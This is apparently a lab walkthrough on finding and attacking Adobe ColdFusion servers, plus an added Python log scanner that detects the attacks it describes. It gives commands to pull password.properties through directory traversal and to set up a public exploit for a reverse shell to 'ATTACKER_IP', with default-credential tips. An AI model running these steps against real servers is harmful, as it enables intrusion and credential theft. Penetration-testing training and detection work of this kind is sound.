🎯 Objective: Identify ColdFusion applications, enumerate version information, and discover default files and directories for further exploitation.
ColdFusion is a Java-based web application development platform using CFML (ColdFusion Markup Language). It is commonly found in enterprise environments and can be recognized by its file extensions (.cfm, .cfc) and default directories.
Question: "What ColdFusion protocol runs on port 5500?"
| Port | Protocol | Description |
|---|---|---|
| 80 | HTTP | Non-secure web communication |
| 443 | HTTPS | Secure web communication |
| 1935 | RPC | Remote Procedure Call |
| 25 | SMTP | Email communication |
| 8500 | SSL | Server communication via SSL |
| 5500 | Server Monitor | Remote administration |
Answer: Server Monitor
```bash
# Nmap service detection
nmap -p- -sC -Pn TARGET --open
# Look for common ColdFusion ports
# 8500/tcp open fmtp (ColdFusion SSL port)
```
- `.cfm` - ColdFusion Markup pages
- `.cfc` - ColdFusion Components
```
# Common ColdFusion paths
/CFIDE/
/cfdocs/
/CFIDE/administrator/
/CFIDE/administrator/index.cfm
```
```
# Response headers indicating ColdFusion
Server: ColdFusion
X-Powered-By: ColdFusion
```
- ColdFusion-specific error pages
- CFML tag references in errors
- Stack traces mentioning ColdFusion
```
# Navigate to ColdFusion installation
http://TARGET:8500/
# Common findings:
# /CFIDE/ - Administrator interface
# /cfdocs/ - Documentation
```
```
# Administrator login page
http://TARGET:8500/CFIDE/administrator/
# Look for version in:
# - Login page footer
# - Error messages
# - Default files
```
```
# Common ColdFusion files
Application.cfm
index.cfm
admin.cfm
install.cfm
```
Positive Identification:
- 🔍 Port 8500 open (SSL/administrator)
- 📁 CFIDE directory accessible
- 📄 `.cfm` extensions in responses
- 🏷️ ColdFusion headers in HTTP responses
- ⚠️ CF error messages with CFML references
Attack Surfaces:
- Administrator interface - Authentication bypass
- Default credentials - admin:admin, blank passwords
- File upload capabilities
- Directory traversal vulnerabilities
- RCE via CFML code execution
Question: "What user is ColdFusion running as?"
```bash
# Download directory traversal exploit
searchsploit -m multiple/remote/14641.py
# Extract password.properties file
python2 14641.py TARGET 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
# Result: Retrieves encrypted passwords and config data
```
```bash
# Download RCE exploit
searchsploit -m cfm/webapps/50057.py
# Modify exploit variables:
# lhost = 'ATTACKER_IP' # Your VPN IP
# lport = 4444 # Listener port
# rhost = 'TARGET_IP' # Target IP
# rport = 8500 # Target port
# Execute exploit for reverse shell
python3 50057.py
# In reverse shell, check user context
whoami
```
Answer: arctic\tolis
- Vulnerable files: `/CFIDE/administrator/settings/mappings.cfm`
- Method: Manipulate `locale` parameter with `../` sequences
- Target: Extract `password.properties` and config files

- Vulnerable path: `/CFIDE/scripts/ajax/FCKeditor/`
- Method: File upload via FCKeditor functionality
- Impact: JSP shell upload → full system compromise
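The two request patterns listed above, seen from the server's access log, as an added example that is not part of the original page: a Python check that flags `locale` values containing `../` under `/CFIDE/administrator/` and POST requests under `/CFIDE/scripts/ajax/FCKeditor/`. The combined log format, the sample lines, the rule names and the FCKeditor sub-path are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (assumed format, placeholder paths).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.cfm HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /CFIDE/administrator/settings/'
    'mappings.cfm?locale=../../../../ColdFusion8/lib/password.properties HTTP/1.1" 200 901',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /cfide/administrator/settings/'
    'mappings.cfm?locale=%2e%2e%2f%2e%2e%2flib%2fpassword.properties HTTP/1.1" 404 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/'
    'example/upload.cfm HTTP/1.1" 200 77',
    '10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 3000',
]

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'\.\.[/\\]')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e%252f is also seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, rule, http_status) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = fully_decode(url.path).lower()
    status = int(m["status"])
    if path.startswith("/cfide/administrator/"):
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key.lower() == "locale" and any(TRAVERSAL.search(fully_decode(v)) for v in values):
                return m["ip"], "locale-traversal", status  # 200 means the server answered it
    if m["method"] == "POST" and path.startswith("/cfide/scripts/ajax/fckeditor/"):
        return m["ip"], "fckeditor-post", status
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]  # hits only, in log order

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A hit with status 200 deserves a closer look than one with 404, since the server returned content for the request.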
```bash
# Search for ColdFusion exploits
searchsploit adobe coldfusion
# Key exploits:
# 14641.py - Directory Traversal
# 50057.py - Unauthenticated RCE
# 27755.txt - Admin Authentication Bypass
```
💡 Pro Tip: ColdFusion installations often have default credentials or weak authentication on the administrator interface - always check /CFIDE/administrator/ for access opportunities.